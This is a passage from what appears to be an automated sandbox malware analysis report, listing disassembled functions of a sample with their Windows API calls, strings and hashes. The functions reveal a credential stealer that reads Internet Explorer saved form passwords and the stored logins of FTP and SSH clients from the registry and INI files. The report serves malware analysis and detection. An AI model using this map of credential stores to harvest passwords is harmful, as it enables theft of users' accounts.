Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

*.*, xrefs: 00404026
\*.*, xrefs: 00404017

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: 788852833f91880b989663a86c155a2a9d0f28116d26d3354b2969baaf3090b1
Instruction ID: 96ffe1822308c344882b937506825fc8f8ea41ddccb83b55b632ba5873b27b1a
Opcode Fuzzy Hash: 788852833f91880b989663a86c155a2a9d0f28116d26d3354b2969baaf3090b1
Instruction Fuzzy Hash: F74174B190021DAAEF21BF21CC45AEE3B69AF44344F1044B7BA08B51F1DB7D8AD19B59

Function 0040A54C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0040A556
wsprintfA.USER32 ref: 0040A5D5
lstrlenW.KERNEL32(?,?), ref: 0040A61B
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A65E
LocalFree.KERNEL32(00000000), ref: 0040A695

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A5F3
%02X, xrefs: 0040A59C, 0040A5CC

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1926481713-2450551051
Opcode ID: e958c0aea493e5eddb307e64e26a3586fc31f98df807a3997f4f368b23dff2c4
Instruction ID: 0cb8d621f53b29ec052e054c22cd4baab442041cd02d1256790fbd51bdebe987
Opcode Fuzzy Hash: e958c0aea493e5eddb307e64e26a3586fc31f98df807a3997f4f368b23dff2c4
Instruction Fuzzy Hash: F6414A72C10218EADF11AFE4DC45AEEBBB9FF08304F14413AF910B51A1D7B98A61CB59

Function 00405024 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405093
lstrcmpiA.KERNEL32(00414FF5,?), ref: 004050C2
lstrcmpiA.KERNEL32(00414FF7,?), ref: 004050DC
FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 00405134
FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405147

Strings

\*.*, xrefs: 00405062

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*
API String ID: 3663067366-1173974218
Opcode ID: f496bd943bc3c47b49bd0d4a583694d55068539748a5df07dfc16f6799754d22
Instruction ID: 432d0d56760ca5de6f9fe85ad1cca2bf93620fddfe304d64f4a8df4e7be6484c
Opcode Fuzzy Hash: f496bd943bc3c47b49bd0d4a583694d55068539748a5df07dfc16f6799754d22
Instruction Fuzzy Hash: FE31FC71900219AAEF20AF61CC42BEE77A9EF04308F4044BBB508B51E1DB789FD19E59

Function 0040A6AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00416330,00000000,00000005,00416340,?), ref: 0040A6C7
StrStrIW.SHLWAPI(00000000,00416360), ref: 0040A73E
CoTaskMemFree.OLE32(00000000,00000000,00416360), ref: 0040A769
CoTaskMemFree.OLE32(00000000,00000000,00000000,00416360), ref: 0040A777

Strings

(, xrefs: 0040A703

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: (
API String ID: 2903366249-3887548279
Opcode ID: cf4af6e450072bda27d8eb8c0dcc654f2adcb1636fba8c51e80148cb01ae3a5f
Instruction ID: 9b2b970a26be7413fbdebaae74da64e154ca195d74620a74edb3d1aa85bf45fb
Opcode Fuzzy Hash: cf4af6e450072bda27d8eb8c0dcc654f2adcb1636fba8c51e80148cb01ae3a5f
Instruction Fuzzy Hash: 3221F834900209EBDF11DFA0D885BDEFB75BF08314F208166E500B62A0D379DAD5DB59

Function 004027AF Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004027EA
GetCurrentProcess.KERNEL32 ref: 004027F4
OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 00402802
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00402844
CloseHandle.KERNEL32(00000000), ref: 00402858

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 8a87f10effa025ea0952635582e6263188028a87954e1098c891bbefb2cdc491
Instruction ID: d0732b3ce1a9884d38cfc08aa7fff178398c2cfc74c669cded003c697c090c44
Opcode Fuzzy Hash: 8a87f10effa025ea0952635582e6263188028a87954e1098c891bbefb2cdc491
Instruction Fuzzy Hash: E9114976904209EBEB119F90DD4ABEE7BB4BB04308F108236A511B51E0D7F89684CB18

Function 0041022F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 0041022F
GetUserNameA.ADVAPI32(?,00000101), ref: 0041027F

Strings

cryptimplus, xrefs: 004102A7

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: InitializeNameUser
String ID: cryptimplus
API String ID: 2272643758-1201002197
Opcode ID: ae5fffb11fa174592083609ee6d8b77875809dff13fe16c676484707b46aa988
Instruction ID: de2264e6b524b9cc1730f11e3bc31deda8a90ce8ab6b33d2c2c52cc9d8090a6b
Opcode Fuzzy Hash: ae5fffb11fa174592083609ee6d8b77875809dff13fe16c676484707b46aa988
Instruction Fuzzy Hash: 66F03A3164420459DB50BBF29946AC839A06B8434CB10443FB814B41E2DEFC8984EA3D

Function 004102E0 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 004102E3
RevertToSelf.ADVAPI32 ref: 0041030E

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: ExceptionFilterRevertSelfUnhandled
String ID:
API String ID: 669012916-0
Opcode ID: afaa296a82b58b36c6ae3d8f4d38a9aa9e9d577753efcfdca12b9ecf39618529
Instruction ID: d946ec2cc30a1461e8b9b859812147d941513197c057a0f40135f9741d7cd52e
Opcode Fuzzy Hash: afaa296a82b58b36c6ae3d8f4d38a9aa9e9d577753efcfdca12b9ecf39618529
Instruction Fuzzy Hash: 18D017740080458ADB317BF2E80A3D93A60AB8930CF44807FA448585A3CFFD04CACA3F

Function 00403771 Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00403711: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756

recv.WSOCK32(?,?,00000001,00000000), ref: 004037A3

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: 72d6c01577f877d3388fded3622fc8768e6356803e80fed206270bce51e8d8c4
Instruction ID: 36e3ef43c85e50d9de3c0b06458be73d01a7fe9bd21fe244589f68d1cd890585
Opcode Fuzzy Hash: 72d6c01577f877d3388fded3622fc8768e6356803e80fed206270bce51e8d8c4
Instruction Fuzzy Hash: 840171F034420ABFEB119E50CC81B9A3F6DAB01346F108237BA01BB1D1D775EE558759

Function 004057E5 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405885
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004058B5
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405903

Strings

Path, xrefs: 00405826
Pass, xrefs: 0040580C
Last Server Host, xrefs: 00405863
Remote Dir, xrefs: 004057F8
Last Server Type, xrefs: 0040584F
Port, xrefs: 004057FD
ServerType, xrefs: 00405821
Last Server Path, xrefs: 00405854
Last Server Pass, xrefs: 00405868
Server.Pass, xrefs: 0040583A
Server.Host, xrefs: 00405835
Server.User, xrefs: 00405830
Last Server User, xrefs: 0040585E
Server Type, xrefs: 004057F3
Server.Port, xrefs: 0040582B
User, xrefs: 00405802
Host, xrefs: 00405807
Last Server Port, xrefs: 00405859

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
API String ID: 1332880857-44262141
Opcode ID: 37c1d9e9603adf99b3d5d725068e223653ef99deb5552346cd2aafc7851fd5fc
Instruction ID: 9f48b2b2f5aff50924b22c0508edfea90403cdf3429f556b955db6b4d9db3edf
Opcode Fuzzy Hash: 37c1d9e9603adf99b3d5d725068e223653ef99deb5552346cd2aafc7851fd5fc
Instruction Fuzzy Hash: F1211B31A80A08FADB116E50CC42FDE7B67AB94708F60C567B518740E5DABD5BD0AF8C

Function 00401F00 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00401F6D
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401FAD
lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402060
lstrlenA.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402099

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004020D0
GetHGlobalFromStream.OLE32(?,?,?,?), ref: 004020FC
GlobalLock.KERNEL32(?), ref: 0040212C
GlobalUnlock.KERNEL32(?), ref: 0040214B
GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 0040215D
GlobalLock.KERNEL32(?), ref: 0040218D
GlobalUnlock.KERNEL32(?), ref: 004021AC

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

Strings

DisplayName, xrefs: 00402035
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00401F63, 00401FBF
UninstallString, xrefs: 00401FF5

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 4234118056-981893429
Opcode ID: 8beeff98deecc092747b9efb06124f816e0c93c1a610c12b7f7d19e03ac6f2bc
Instruction ID: 15f42499c566025621d8331c6036e960131b545883233b226f170f05142028a8
Opcode Fuzzy Hash: 8beeff98deecc092747b9efb06124f816e0c93c1a610c12b7f7d19e03ac6f2bc
Instruction Fuzzy Hash: DD613E758001A8BADB31BB21CD42BEA7679AB44344F1044FBB648B11E1D7BD5FC4AE68

Function 00402A46 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

S-1-5-18, xrefs: 00402AFB

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: S-1-5-18
API String ID: 0-4289277601
Opcode ID: 507e99352afb5b2641655df89ce7b2cc2547c45d20bc9c59a8cf25a70d54eb6a
Instruction ID: 3360d111c81ebcf6c67bf3a53238a8ab977efa88f5f40edca8934fe4e0a5cfb5
Opcode Fuzzy Hash: 507e99352afb5b2641655df89ce7b2cc2547c45d20bc9c59a8cf25a70d54eb6a
Instruction Fuzzy Hash: 79212F71A00109AFDF21AFA0DD8ABEE7B75FB40704F504577A410F51E5DBB9AA80CB18

Function 004064D0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 004064E6
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040651A
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040674D

Strings

InitialPath, xrefs: 004065AB
PasswordType, xrefs: 00406612
Password, xrefs: 00406551
Login, xrefs: 0040658D
Port, xrefs: 004065CE
Host, xrefs: 0040656F

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$InitialPath$Login$Password$PasswordType$Port
API String ID: 1332880857-4069465341
Opcode ID: 4313b75cfc96e529fc553892e8b380622a8d0d93476fb3806691a936edbb6d7d
Instruction ID: d83463a765403df5e535637fa98480749d8d72bfa76fab91d0f6161c0d13a968
Opcode Fuzzy Hash: 4313b75cfc96e529fc553892e8b380622a8d0d93476fb3806691a936edbb6d7d
Instruction Fuzzy Hash: BB51E53180011CEADF216B51CC41BEDBAB9BF44304F10C0FAB589741A1CB7A5BA5EF98

Function 0040CE9D Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040CEB0
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040CEE4
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D0ED

Strings

ServerType, xrefs: 0040CFD5
PortNumber, xrefs: 0040CF74
ServerName, xrefs: 0040CF39
UserID, xrefs: 0040CF54
InitialDirectory, xrefs: 0040CFBA
Password, xrefs: 0040CF1E

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
API String ID: 1332880857-2649023343
Opcode ID: 68ee43048ec011c15c6e5167774f9730bdbe3fb483a677f948d462c853689766
Instruction ID: de48f3cf1203ecee9757a8e4ad920ee784aa0c90b84baed0ac799ee5886245e8
Opcode Fuzzy Hash: 68ee43048ec011c15c6e5167774f9730bdbe3fb483a677f948d462c853689766
Instruction Fuzzy Hash: F651C631900118FADF216B61CC42BDDBABABF04344F54C1BAB548740B1DB7A9B91AF99

Function 004079F4 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407A07
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A3B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C51

Strings

HostName, xrefs: 00407A8E
Password, xrefs: 00407A73
UserName, xrefs: 00407AA9
PortNumber, xrefs: 00407AE4
FSProtocol, xrefs: 00407B32
RemoteDirectory, xrefs: 00407AC4

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
API String ID: 1332880857-3874328862
Opcode ID: b3ae5fa0137a43e6c3acca1794bdfaa13e7c7035e9cac5ffd845bd55192dcfe0
Instruction ID: 6ba95fd970e938fcab2c26ca14cdf170eeafc08718ad228059479bab44013bc4
Opcode Fuzzy Hash: b3ae5fa0137a43e6c3acca1794bdfaa13e7c7035e9cac5ffd845bd55192dcfe0
Instruction Fuzzy Hash: CD51D33190011CBADF216F51CC42BDD7ABABF44308F50C1BAB548751A1DB7AAB91AF89

Function 0040DA8D Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DAA0
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DAD4
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCBD

Strings

FTP destination port, xrefs: 0040DB62
FTP profiles, xrefs: 0040DB9D
FTP destination server, xrefs: 0040DB0C
FTP destination catalog, xrefs: 0040DB7D
FTP destination password, xrefs: 0040DB42
FTP destination user, xrefs: 0040DB27

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
API String ID: 1332880857-3620412361
Opcode ID: 525be7967cdf949b2b4fe62e06db19f4aa65a3c630158b24c30b162ab2062eaf
Instruction ID: 35c8621cfcc2f8450d45fb2bc6be30e8d99e81c950d52ea4d39d537080795974
Opcode Fuzzy Hash: 525be7967cdf949b2b4fe62e06db19f4aa65a3c630158b24c30b162ab2062eaf
Instruction Fuzzy Hash: 3B519631900118FADF626F51CC42BDD7AB6BF04304F5085BAB548741B1DBBA9BA59FC8

Function 00407D46 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407D59
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407D8D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F55

Strings

ServerType, xrefs: 00407E51
Url, xrefs: 00407DE5
UserName, xrefs: 00407E00
PassWord, xrefs: 00407DCA
RootDirectory, xrefs: 00407E1B
Port, xrefs: 00407E36

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
API String ID: 1332880857-2128033141
Opcode ID: 499a83b9ee0d19bae6b4d4a67f559f60542ea790b3aedc78fc2aed282f5518e8
Instruction ID: ed5aa321c4a7382c56c9ed296d4768114fa0973e83d11c553023a5e170f729af
Opcode Fuzzy Hash: 499a83b9ee0d19bae6b4d4a67f559f60542ea790b3aedc78fc2aed282f5518e8
Instruction Fuzzy Hash: 8651A33184011CBADF226F51CC42BEC7ABABF04304F50C5BAB558741B1DB7A5BA1AF89

Function 00402524 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 0040253F
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402558
RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 00402565
GetTempPathA.KERNEL32(00000104,?), ref: 0040257E
CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 0040259F
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004025FA
CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402618
DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402627

Strings

Software\WinRAR, xrefs: 00402534

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
String ID: Software\WinRAR
API String ID: 3443402316-224198155
Opcode ID: 66d1b11641d647b5ce2a525391feea64acc522b9e6822cfa81a9fc4e8aafade5
Instruction ID: 6904ef1b2772d710c1d8bf12838b52ee9381b0c06debd4c8e703c90749263143
Opcode Fuzzy Hash: 66d1b11641d647b5ce2a525391feea64acc522b9e6822cfa81a9fc4e8aafade5
Instruction Fuzzy Hash: C4217F7190020DBBEF21BFA1CD46FDE7A69AB10748F10047AB604B50E1D6FA9BD09B1C

Function 0040E824 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E847
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E87B
GetPrivateProfileStringA.KERNEL32(Program,DataPath,004148B8,?,00000104,00000000), ref: 0040E901
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E95A

Strings

\PocoSystem.ini, xrefs: 0040E8D5
accounts.ini, xrefs: 0040E910
Program, xrefs: 0040E8FC
Path, xrefs: 0040E8B3
DataPath, xrefs: 0040E8F7

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AllocCloseEnumLocalOpenPrivateProfileString
String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
API String ID: 1343824468-2495907966
Opcode ID: 07d445bfdfa8761b4962d96e49eecba8f4178bdcbcf5bc8d6308a944531efd02
Instruction ID: 64361b49ab85cc2657c0af7d94bcaecc0f4019614862639bf0536436395d07b8
Opcode Fuzzy Hash: 07d445bfdfa8761b4962d96e49eecba8f4178bdcbcf5bc8d6308a944531efd02
Instruction Fuzzy Hash: 8D31F87194020CBAEF61BB51CC42FDD7ABABF14304F10C4BBB544B50E1CAB95AA19F99

Function 00404E8C Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404EB0

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,004148B8,?,00000104,?), ref: 00404F00
GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,004148B8,?,00000104,?), ref: 00404F3B

Strings

\Ipswitch, xrefs: 00404F87, 00404F96, 00404FA5
WS_FTP, xrefs: 00404EFB, 00404F36
DEFDIR, xrefs: 00404F31
\Ipswitch\WS_FTP, xrefs: 00404F6B
DIR, xrefs: 00404EF6
\win.ini, xrefs: 00404EC8

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
API String ID: 2508676433-45949541
Opcode ID: 0affe33e2018649f64b0b97f7b29bc4be182e6ecc69700ed5e3dde3a7c24470b
Instruction ID: 20e4cbabcb38d3a8dbf79de88f3cded1c9f2a6ba63dff5cad0e01ff50808c984
Opcode Fuzzy Hash: 0affe33e2018649f64b0b97f7b29bc4be182e6ecc69700ed5e3dde3a7c24470b
Instruction Fuzzy Hash: F3213671A80208BEEB11BB61CC43FDD7A69AB84744F500077B748F51E2DBF99AC09A5D

Function 0040623E Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406254
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406288
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406496

Strings

PthR, xrefs: 00406314
Port, xrefs: 00406337
Host, xrefs: 004062D8
SSH, xrefs: 00406385
User, xrefs: 004062F6

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Port$PthR$SSH$User
API String ID: 1332880857-1643752846
Opcode ID: e118c3bfb3773c56276887e609a15de6210c5a38b762f93b15efbbf9f375b10b
Instruction ID: 7e462e80501d9e5d3e76f56de11c39f25c7f68219fd9cfee39f09a4e9e0ed859
Opcode Fuzzy Hash: e118c3bfb3773c56276887e609a15de6210c5a38b762f93b15efbbf9f375b10b
Instruction Fuzzy Hash: 3851C331800118FADF217F51CC42BDDBAB9BF44304F50C1BAB549741B1DBBA5AA1AF99

Function 00403C26 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C99
